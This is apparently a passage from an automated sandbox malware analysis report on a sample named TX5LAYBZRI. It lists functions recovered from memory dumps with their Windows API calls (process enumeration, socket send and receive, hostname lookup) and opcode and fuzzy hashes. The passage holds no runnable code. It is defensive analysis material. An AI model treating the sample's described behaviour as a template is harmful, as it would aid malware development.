                                            • Opcode ID: 3b6f1ffd4a6346034453e976a660602c8e032610928520fbca637a02cb1581e3
                                            • Instruction ID: 16807291bbc276e6809f0c09f787e6bfdfeb7cb5a86de29f118ebf6cbb7bb3cc
                                            • Opcode Fuzzy Hash: 3b6f1ffd4a6346034453e976a660602c8e032610928520fbca637a02cb1581e3
                                            • Instruction Fuzzy Hash: 2C4156E726D110BEA2C2A06D5F54AFA2B5DE9D3338B34882BF407DB543F2C44A4E4031
                                            Function 0798023A Relevance: 1.7, APIs: 1, Instructions: 212COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7421686ecbfeef344484c68273331baf8f384f36b792d28da61fdaf219fd0d11
                                            • Instruction ID: 31c37b29bbeef1ec2138a46dd4bf97435dce89c48fa12ae12294e282f8a1563f
                                            • Opcode Fuzzy Hash: 7421686ecbfeef344484c68273331baf8f384f36b792d28da61fdaf219fd0d11
                                            • Instruction Fuzzy Hash: 564147E726D121BEA2C2B4695F549FA2B6EE9D3338B348827F407CB543F2C44A4E5071
                                            Function 07980223 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 38a1027a9ee8983425efaac93168c2be15597cb0d0a77a88329474f786d34a1e
                                            • Instruction ID: 4fe18aa9f9cf7993601f821a6096fc166c4ad9aba05ea0714df4d027112cdb9d
                                            • Opcode Fuzzy Hash: 38a1027a9ee8983425efaac93168c2be15597cb0d0a77a88329474f786d34a1e
                                            • Instruction Fuzzy Hash: 3E4156E726D120BEA2C2A5695F549FA2B6EE9D3738B348827F407C7542F2C44A4E5071
                                            Function 07980281 Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: ea2236e353bf5515bc0f8f578029799013138dc17ec914416ab6aa9f526ecbda
                                            • Instruction ID: eafc6a9952c70c27c8cd5e80dfdd15833c31a77d4306b794f20521d90e623b45
                                            • Opcode Fuzzy Hash: ea2236e353bf5515bc0f8f578029799013138dc17ec914416ab6aa9f526ecbda
                                            • Instruction Fuzzy Hash: 434136E726D121BEA382A4695F549FA2B5EE5D3338B348826F407D7543F3C44A4E5031
                                            Function 00C44950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • gethostname.WS2_32(00000000,00000040), ref: 00C44AA5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: gethostname
                                            • String ID:
                                            • API String ID: 144339138-0
                                            • Opcode ID: 7addf1a7aba5d3aeb0b7c2cd796c1abf3fe5ba2c97a7c75f3de53c7115118c1b
                                            • Instruction ID: e990db6958e4b5d728116ef8f527fbb167ee724a5f95e272f744e56e1f31aceb
                                            • Opcode Fuzzy Hash: 7addf1a7aba5d3aeb0b7c2cd796c1abf3fe5ba2c97a7c75f3de53c7115118c1b
                                            • Instruction Fuzzy Hash: 8151E3B0604B008BEB389F25ED4976376E8FF11315F24193CE99A866D1E774ED84E702
                                            Function 079802E6 Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                            Download Yara Rule
                                            APIs
                                            • Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: cc246ea4c255979037596b940be6b7f0ddc36f92bd00e025155d7f0749191796
                                            • Instruction ID: 8d7469fbf30058edd9182287f924d4ed6bc8068d706d50497d98d3f23db7722d
                                            • Opcode Fuzzy Hash: cc246ea4c255979037596b940be6b7f0ddc36f92bd00e025155d7f0749191796
                                            • Instruction Fuzzy Hash: EE3105EB2AC121BE72C2A06D5F649FA165EE5D7338F348827B807D7642F3D44A4E1031
                                            Function 079802A8 Relevance: 1.6, APIs: 1, Instructions: 150COMMON
                                            Download Yara Rule
                                            APIs
                                            • Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: 1c1fb6c785d8d93f4ad6ed3a2e59b24d40a23af136da50121b9b8daa29f0b711
                                            • Instruction ID: 1b5a7298bfcdf386c4f4df88a5c877132efd32d4f777d6634acfced1a169b21f
                                            • Opcode Fuzzy Hash: 1c1fb6c785d8d93f4ad6ed3a2e59b24d40a23af136da50121b9b8daa29f0b711
                                            • Instruction Fuzzy Hash: 6D31C3EB1AC121BE72C2A05D5F149FA5A1EE5D7338B348D27B80BD6642F3D44A4E5031
                                            Function 07980303 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                            Download Yara Rule
                                            APIs
                                            • Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: 0cac04d0111c084798bcbb10fddcaaedac3676011dac4175af150e99449096ad
                                            • Instruction ID: 5ace5ad727d08618e6e8f86d94c8b3537be8323d149adc03d15ecd0080978253
                                            • Opcode Fuzzy Hash: 0cac04d0111c084798bcbb10fddcaaedac3676011dac4175af150e99449096ad
                                            • Instruction Fuzzy Hash: 8A21D3EB2AC121BE72C2A06D6F149FA161EE5D7738B348927B80BD7642F3D44E4E1071
                                            Function 07980336 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                            Download Yara Rule
                                            APIs
                                            • Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: f0077f9be4d099a55601e1da025647e5ee19c5384c802a7d3ec99af99c11c42b
                                            • Instruction ID: 4d41c508f0a5b23c52dcc96b029a50ef5d175fed1196d4866f63d4eecb1d6f91
                                            • Opcode Fuzzy Hash: f0077f9be4d099a55601e1da025647e5ee19c5384c802a7d3ec99af99c11c42b
                                            • Instruction Fuzzy Hash: BC21E5EB2AC111BE7282A1696F249FA571EE5D7738B348D27F807C7142F2D44A5E5031
                                            Function 07980329 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                            Download Yara Rule
                                            APIs
                                            • Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: f7cd7886cac11cadcf1327e52fffd082ccdd24b1706c257f8e134fc1e21ee786
                                            • Instruction ID: a2cb91d8ed92305d4ee65eb25f83bd5c8f0dca544e567966a0b12c6ee8228fe1
                                            • Opcode Fuzzy Hash: f7cd7886cac11cadcf1327e52fffd082ccdd24b1706c257f8e134fc1e21ee786
                                            • Instruction Fuzzy Hash: 15219FEB2AC121BD3286A06E6F149FA561EE4D7738B348927B80BD6642F2C44E4E1071
                                            Function 0798031D Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                            Download Yara Rule
                                            APIs
                                            • Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: 21896e71e8667682799d4c690cc975cfda08c1635cfcbac012d8c0cf55f7eb9e
                                            • Instruction ID: e33fce7f987df849193b24b9188540b7c022028aedf9d45600f176c7154fe5cd
                                            • Opcode Fuzzy Hash: 21896e71e8667682799d4c690cc975cfda08c1635cfcbac012d8c0cf55f7eb9e
                                            • Instruction Fuzzy Hash: F12192EB2AC121BD3286A06D6F149FA561EE4D7738B358927B80BD7642F2C44E4E1071
                                            Function 079803AA Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                            Download Yara Rule
                                            APIs
                                            • Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: 3eb697af695e8bcde69e96dddf5aad6e0fe23577c850180692f95fa4eeecea47
                                            • Instruction ID: 908e32d4bb82114a14b5ae896699533f6d137f996b10a835c6fad655bcce8b72
                                            • Opcode Fuzzy Hash: 3eb697af695e8bcde69e96dddf5aad6e0fe23577c850180692f95fa4eeecea47
                                            • Instruction Fuzzy Hash: AB21D1E72AD121BEB282A46D5F149FA2B5EE4D733C7398923F847CB142F2C54A4E4171
                                            Function 07980381 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                            Download Yara Rule
                                            APIs
                                            • Process32FirstW.KERNEL32(?,?,079801BC), ref: 079803F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: 199fc805ae6bdf95cab4d9437590d85baedc7a4325b45c4438f929c034321347
                                            • Instruction ID: 2a1ecd775f634bfbe1bf8b80f0ba7b4e7fec0dde2530f4436a7061f15ca19b1a
                                            • Opcode Fuzzy Hash: 199fc805ae6bdf95cab4d9437590d85baedc7a4325b45c4438f929c034321347
                                            • Instruction Fuzzy Hash: E41182E72AC121BE7282A06D2F149FA571EE4D7338B388927F807D7242F3D54A5E5071
                                            Function 00C5AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                            Download Yara Rule
                                            APIs
                                            • getsockname.WS2_32(?,?,00000080), ref: 00C5AFD1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: getsockname
                                            • String ID:
                                            • API String ID: 3358416759-0
                                            • Opcode ID: 7fba6f6919f4ed548c81850dc2fe02712228fdf171397c643f500714d7cfa76b
                                            • Instruction ID: 549454a714c8197bb625b5013de5c610cef7a6223cd123bb1bc8dccd6d45d82d
                                            • Opcode Fuzzy Hash: 7fba6f6919f4ed548c81850dc2fe02712228fdf171397c643f500714d7cfa76b
                                            • Instruction Fuzzy Hash: 5411967080878595EB268F59D8027F6B3F4EFD0329F109618E9A942150F7325AC98BD2
                                            Function 00C5A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00C5A97F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID:
                                            • API String ID: 2809346765-0
                                            • Opcode ID: 1937290bf8cb089649d781680394969e5153492544e346a56f0dcb99c980fb06
                                            • Instruction ID: 6cc524c84669f752fcb0f1446b483f3b95e42b11a610fbbb7f40b0621bbd2d09
                                            • Opcode Fuzzy Hash: 1937290bf8cb089649d781680394969e5153492544e346a56f0dcb99c980fb06
                                            • Instruction Fuzzy Hash: E501A276B10710AFC6148F15DC85B56B7A5EF84721F068659EA982B361C331AC548BE1
                                            Function 00C5A870 Relevance: 1.5, APIs: 1, Instructions: 33networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • recv.WS2_32(000000FF,00C46F4E,000000FF,00000000,00000000,000000FF,00C46F4E,000000FF,?,00000000,?), ref: 00C5A8B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: recv
                                            • String ID:
                                            • API String ID: 1507349165-0
                                            • Opcode ID: 228ad04b8ad9bf31605526f40337d64b23e0f5263b3d11aa10deb2331e935d70
                                            • Instruction ID: 9e46ff21efca52b35ace7443673f52c1f3fb9e6e344d69a901080ee079030a98
                                            • Opcode Fuzzy Hash: 228ad04b8ad9bf31605526f40337d64b23e0f5263b3d11aa10deb2331e935d70
                                            • Instruction Fuzzy Hash: 2BF0A076B043207BD5208A18EC01FABF369EBC0B20F158A49B914272888360BC4186E6
                                            Function 00C5AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • socket.WS2_32(?,00C5B280,00000000,-00000001,00000000,00C5B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00C5AF67
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID:
                                            • API String ID: 98920635-0
                                            • Opcode ID: f17d028e791bd8040e94f867168e3b55f6c28bf03ea2328056f6d14dde0ce8a7
                                            • Instruction ID: a5a071afd6a3c56658b047cbd8a1d41c0bd7c0464e67d0a6170d5bff51746046
                                            • Opcode Fuzzy Hash: f17d028e791bd8040e94f867168e3b55f6c28bf03ea2328056f6d14dde0ce8a7
                                            • Instruction Fuzzy Hash: 58E06DB6A083216BC610CB48F8409ABF369EFC4B20F054B49BC6463214C330AC848BE2
                                            Function 00C5B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • closesocket.WS2_32(?,00C59422,?,?,?,?,?,?,?,?,?,?,?,00C43377,0106C880,00000000), ref: 00C5B04D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: closesocket
                                            • String ID:
                                            • API String ID: 2781271927-0
                                            • Opcode ID: cff26fdd484b361571a05a9ea2e11151c2ec08a931a7ba85881712463a1b8fdd
                                            • Instruction ID: f631f409ab542749f92b2251e54e628dd435d43732c1e972a2fffc2f8b64b3b6
                                            • Opcode Fuzzy Hash: cff26fdd484b361571a05a9ea2e11151c2ec08a931a7ba85881712463a1b8fdd
                                            • Instruction Fuzzy Hash: 98D0C27830020157CA209A14C9C4A57BB2B7FD1711FA9CB68E83C4A1E5C73BCD8BC601
                                            Function 00BF67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                            Download Yara Rule
                                            APIs
                                            • ioctlsocket.WS2_32(?,8004667E,?,?,00BCAF56,?,00000001), ref: 00BF67FC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: ioctlsocket
                                            • String ID:
